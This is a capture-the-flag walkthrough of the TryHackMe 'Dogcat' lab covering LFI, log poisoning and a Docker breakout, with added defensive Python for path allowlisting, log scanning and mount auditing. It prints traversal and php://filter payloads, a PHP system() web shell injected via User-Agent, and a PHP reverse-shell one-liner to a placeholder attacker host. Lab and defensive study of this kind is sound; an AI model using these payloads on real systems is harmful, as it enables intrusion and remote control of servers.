In this walkthrough, we’ll explore the Dogcat room on TryHackMe, a box that features a Local File Inclusion (LFI) vulnerability and Docker privilege escalation. LFI allows us to read sensitive files from the system and eventually gain access to the server. There are a total of 4 flags on this machine which we need to find.
Let’s Dive in!
Step 1: Scanning the Target
Start by scanning the target machine to find open ports and services:
nmap -sV -p- <target-ip>
The scan reveals the following open ports:
Port 80: HTTP
Port 22: SSH
When you visit the website hosted on port 80, you’ll see a website which shows dog and cat pictures. Time to start web enumeration.
Step 2: Enumerating the Web
As you explore the Dogcat website, you’ll notice the URL follows a parameter-based format (a view parameter selects which page is shown), which is a potential sign of file inclusion vulnerabilities. Let’s test whether we can exploit a Local File Inclusion (LFI) vulnerability to access sensitive files.
While testing for Local File Inclusion (LFI) vulnerabilities in the Dogcat room, I noticed that using the ../ directory traversal method only works when the URL contains a “dog” or “cat” keyword.
resulted in “file cannot be opened” errors. However, when I tried this:
?view=dog/../index
it triggered an error:
Fatal error: Cannot redeclare containsStr()
This error occurs because the containsStr() function is being declared multiple times in the same file, likely due to the index.php file being included multiple times by the LFI payload.
After researching, I found that using the php://filter wrapper allows you to bypass this issue. The php://filter wrapper (here with the convert.base64-encode filter) returns a file’s source as base64 instead of executing it, which prevents the function redeclaration error. By applying this technique, you can safely read the source of index.php and continue exploiting the LFI vulnerability.
<target-IP>/?view=php://filter/convert.base64-encode/resource=dog/../../.././…var/www/html/index
This will allow you to see the index file’s source (base64-encoded, so decode it before reading).
The code suggests that to make the LFI work on other files we will need to put another variable, $ext, in the URL.
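To make the weakness concrete, here is an added Python model (not the room’s PHP and not the author’s code) of the two behaviours the walkthrough describes: a substring check for “dog”/“cat” with a client-supplied $ext appended, beside an allowlist version that closes the hole. The web root, the allowlist contents and the exact logic of containsStr() are assumptions, since the page only shows the error message and the payloads.

```python
import posixpath
from typing import Dict, Optional, Tuple

# Constructed for this example: the directory the "view" pages live in and the
# only pages the application should ever include (assumed, not from the room).
WEB_ROOT = "/var/www/html"
ALLOWED_VIEWS = frozenset({"dog", "cat"})


def contains_str(haystack: str, needle: str) -> bool:
    """Plain substring test, modelling the keyword check the room's containsStr()
    appears to perform (assumed; the real function body is not on the page)."""
    return needle in haystack


def weak_resolve(view: str, ext: str = ".php") -> Optional[str]:
    """The behaviour the walkthrough describes: any view containing "dog" or "cat"
    is included, with a client-controllable $ext appended. Returns the string that
    would be handed to include(), or None when the check rejects it."""
    if contains_str(view, "dog") or contains_str(view, "cat"):
        return view + ext
    return None


def hardened_resolve(view: str, ext: Optional[str] = None) -> Optional[str]:
    """Allowlist version: the view must be exactly one of the known pages, the
    extension is fixed server-side, and the final path is still checked to sit
    directly inside WEB_ROOT as defence in depth."""
    if ext is not None:            # never let the client choose the extension
        return None
    if view not in ALLOWED_VIEWS:  # exact match, not a substring test
        return None
    target = posixpath.normpath(posixpath.join(WEB_ROOT, view + ".php"))
    if posixpath.dirname(target) != WEB_ROOT:
        return None
    return target


# Constructed probes covering the cases the walkthrough discusses.
PROBES = [
    "dog",                                                        # legitimate page
    "../../etc/passwd",                                           # no keyword: weak check rejects it
    "dog/../index",                                               # keyword present: traversal slips through
    "php://filter/convert.base64-encode/resource=dog/../index",   # wrapper string also contains "dog"
]


def compare(probes=PROBES) -> Dict[str, Tuple[Optional[str], Optional[str]]]:
    """Map each probe to (weak result, hardened result) for side-by-side review."""
    return {p: (weak_resolve(p), hardened_resolve(p)) for p in probes}


if __name__ == "__main__":
    for probe, (weak, hard) in compare().items():
        print(f"{probe!r:62} weak={weak!r:45} hardened={hard!r}")
```

The point to take from the comparison: a keyword test is a denylist in disguise, and anything that merely contains the keyword (a traversal segment, a stream wrapper) passes it, whereas an exact-match allowlist with a server-fixed extension leaves the client no path component to control.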
Step 3: LFI (Local File Inclusion) to RCE (Remote Code Execution) – Log Poisoning
It took me some time to fully understand and exploit this vulnerability, but here’s the exact method that worked. A highly useful resource that helped me during this process was RevShells. This website allows you to generate different types of reverse shells easily and also provides options to encode and decode the payloads based on your requirements, making it invaluable for LFI exploitation and other penetration testing tasks.
Log poisoning is a powerful attack method where malicious input is injected into application logs, such as web server logs or application logs, with the intent of exploiting vulnerabilities like Local File Inclusion (LFI) or Remote Code Execution (RCE). Once an attacker is able to include or execute these poisoned logs via an LFI vulnerability, they can escalate the attack, potentially gaining full control over the target system.
I used Developer Tools to check for log poisoning by injecting the string “Hello World” into the User-Agent header. I used the User-Agent header because it is reflected directly in the access.log files. During the LFI attack, I observed that the string injected in the User-Agent was successfully reflected back, confirming the vulnerability and providing a foothold for further exploitation.
I tried reverse shell through User-Agent but that didn’t work.
Then I injected this payload in the log
<?php system($_GET['cmd']); ?>
The payload above leverages the cmd parameter in the URL, allowing it to be passed to the PHP system() function. This enables the execution of system commands directly on the target server, providing a way to exploit vulnerabilities and gain further access. By appending cmd to the URL, attackers can inject and execute arbitrary commands, making it a critical method in Remote Code Execution (RCE) attacks.
This is how I got the first flag.
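From the defender’s side, the same log that gets poisoned is also where the attack is easiest to spot. The following added Python (not from the room or the author) parses a few constructed combined-format access log lines and flags the indicators this step relies on: PHP open tags in a logged header, traversal segments or a php:// wrapper in the request, and requests that reference a log file. The log format, sample lines and indicator list are assumptions for illustration.

```python
import re
from typing import Dict, List
from urllib.parse import unquote

# Apache/nginx "combined" format:
# ip ident user [time] "request" status bytes "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Indicators kept deliberately narrow to limit false positives.
PHP_TAG_RE = re.compile(r"<\?(?:php\b|=)", re.IGNORECASE)      # PHP open tag in a logged header
TRAVERSAL_RE = re.compile(r"\.\./")                            # directory traversal segment
WRAPPER_RE = re.compile(r"\bphp://", re.IGNORECASE)            # php://filter, php://input, ...
LOG_TARGET_RE = re.compile(r"access\.log|error\.log|/var/log/", re.IGNORECASE)


def parse_line(line: str) -> Dict[str, str]:
    """Split one combined-format line into fields; empty dict if it does not parse."""
    m = COMBINED_RE.match(line.rstrip("\n"))
    if not m:
        return {}
    entry = m.groupdict()
    # Requests are logged URL-encoded; decode once so ..%2f and %3C%3Fphp match too.
    entry["request_decoded"] = unquote(entry["request"])
    entry["ua_decoded"] = unquote(entry["ua"])
    return entry


def classify(entry: Dict[str, str]) -> List[str]:
    """Return the reasons this entry looks like LFI / log poisoning activity."""
    reasons: List[str] = []
    req, ua = entry["request_decoded"], entry["ua_decoded"]
    if PHP_TAG_RE.search(ua) or PHP_TAG_RE.search(entry["referer"]):
        reasons.append("php_tag_in_logged_header")
    if TRAVERSAL_RE.search(req):
        reasons.append("path_traversal_in_request")
    if WRAPPER_RE.search(req):
        reasons.append("php_wrapper_in_request")
    if LOG_TARGET_RE.search(req):
        reasons.append("log_file_referenced_in_request")
    return reasons


def scan(lines) -> List[Dict[str, object]]:
    """Scan an iterable of log lines and collect the suspicious ones with line numbers."""
    findings: List[Dict[str, object]] = []
    for n, line in enumerate(lines, 1):
        entry = parse_line(line)
        if not entry:
            continue
        reasons = classify(entry)
        if reasons:
            findings.append({"line": n, "ip": entry["ip"],
                             "request": entry["request"], "reasons": reasons})
    return findings


# Constructed sample log: one benign request, one header poisoning attempt,
# one php://filter source read and one attempt to include the log itself.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Jan/2024:10:00:01 +0000] "GET /?view=dog HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Jan/2024:10:00:07 +0000] "GET /?view=cat HTTP/1.1" 200 511 "-" '
    '"<?php system($_GET[\'cmd\']); ?>"',
    '10.0.0.9 - - [10/Jan/2024:10:00:12 +0000] '
    '"GET /?view=php://filter/convert.base64-encode/resource=dog/../index HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Jan/2024:10:00:20 +0000] '
    '"GET /?view=dog/../../../../var/log/apache2/access.log&ext=&cmd=id HTTP/1.1" 200 8192 "-" "Mozilla/5.0"',
]


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f['line']} from {f['ip']}: {', '.join(f['reasons'])}  [{f['request']}]")
```

In practice you would feed the real access log through scan() (or the equivalent rule in your SIEM) and alert on the header indicator alone: a PHP tag has no legitimate reason to appear in a User-Agent, and catching it at write time is far cheaper than discovering it after the log has been included.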
Step 4: Getting a Reverse Shell
After injecting the system-based payload, getting a reverse shell was fairly easy. I URL-encoded this payload to get a reverse shell:
php -r '$sock=fsockopen("attackerIP",attackerport);system("sh <&3 >&3 2>&3");'
Start a Netcat listener on your machine:
You will get Flag 2 if you run cd ../ and look in another file there.
Step 5: Privilege Escalation
The sudo -l command lists the commands the current user is allowed to run with sudo (including any marked NOPASSWD, which need no password), which helps in privilege escalation assessments.
sudo -l
Step 6: Docker Breakout
In the description of this machine, you would have noticed that this is a Docker environment.
After looking around the system, I found there is a backup file in /opt.
Upon inspecting the launch.sh file, you’ll notice that a volume is mounted from the Docker container to the host system. This is key for potential exploitation. The backup.sh script creates a tar archive of the /root/container directory, which is a critical clue for privilege escalation.
Although running crontab -e didn’t show anything, it’s likely that the host OS is executing the backup.sh script. This presents an opportunity to inject a bash reverse shell into the script. Before injecting, ensure you have a Netcat listener set up on your chosen port, ready to catch the reverse shell.
Bash Command used:
After inserting the bash command, this is what the /backup.sh file looked like.
You will have a reverse shell again but this time to the host machine!
That’s how you will get your 4th flag!
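The root cause of this breakout is a host directory bind-mounted writable into the container while a host-side job executes a script from it. As an added example (not part of the room or the author’s write-up), the Python below audits the Mounts array of docker inspect output and flags writable bind mounts of sensitive host paths, which is the check an operator would run to catch this configuration before it is abused. The container name, the mount destination (/opt/backups) and the sensitive-path list are constructed assumptions; the /root/container source path is the one named in the walkthrough.

```python
import json
import posixpath
from typing import Dict, List

# Host paths that should never be bind-mounted writable into a container: a
# writable mount lets code inside the container alter files the host (its
# cron, its root user) will later read or execute. Assumed list for this example.
SENSITIVE_HOST_PATHS = ("/root", "/etc", "/home", "/var/spool/cron", "/var/run/docker.sock")


def is_sensitive_host_path(source: str) -> bool:
    """True if the host source path is, or sits under, a sensitive location."""
    src = posixpath.normpath(source)
    if src == "/":
        return True
    return any(src == p or src.startswith(p + "/") for p in SENSITIVE_HOST_PATHS)


def audit_mounts(inspect_json: str) -> List[Dict[str, str]]:
    """Walk the Mounts array of `docker inspect <container>` output and report
    bind mounts whose host source is sensitive; writable ones are rated high."""
    findings: List[Dict[str, str]] = []
    for container in json.loads(inspect_json):
        name = container.get("Name", "?")
        for m in container.get("Mounts", []):
            if m.get("Type") != "bind":          # named volumes / tmpfs are not host paths
                continue
            if not is_sensitive_host_path(m.get("Source", "")):
                continue
            writable = bool(m.get("RW", True))
            findings.append({
                "container": name,
                "source": m["Source"],
                "destination": m.get("Destination", ""),
                "severity": "high" if writable else "medium",
                "note": ("writable bind mount of sensitive host path; host-side jobs reading or "
                         "executing files here can be influenced from inside the container"
                         if writable else "read-only bind mount of sensitive host path"),
            })
    return findings


# Constructed docker inspect output (the real command prints a JSON array of
# containers; only the fields this audit reads are included).
SAMPLE_INSPECT = json.dumps([{
    "Name": "/dogcat-web",
    "Mounts": [
        {"Type": "bind", "Source": "/root/container", "Destination": "/opt/backups",
         "Mode": "", "RW": True, "Propagation": "rprivate"},
        {"Type": "volume", "Name": "webdata", "Source": "/var/lib/docker/volumes/webdata/_data",
         "Destination": "/data", "Driver": "local", "Mode": "z", "RW": True, "Propagation": ""},
        {"Type": "bind", "Source": "/srv/static", "Destination": "/var/www/static",
         "Mode": "ro", "RW": False, "Propagation": "rprivate"},
    ],
}])


if __name__ == "__main__":
    for f in audit_mounts(SAMPLE_INSPECT):
        print(f"[{f['severity']}] {f['container']}: {f['source']} -> {f['destination']} ({f['note']})")
```

The remediation follows directly from the finding: mount only the specific subdirectory the container needs, mark it read-only where the container has no reason to write, and never let a host cron job execute a script that lives on a container-writable path.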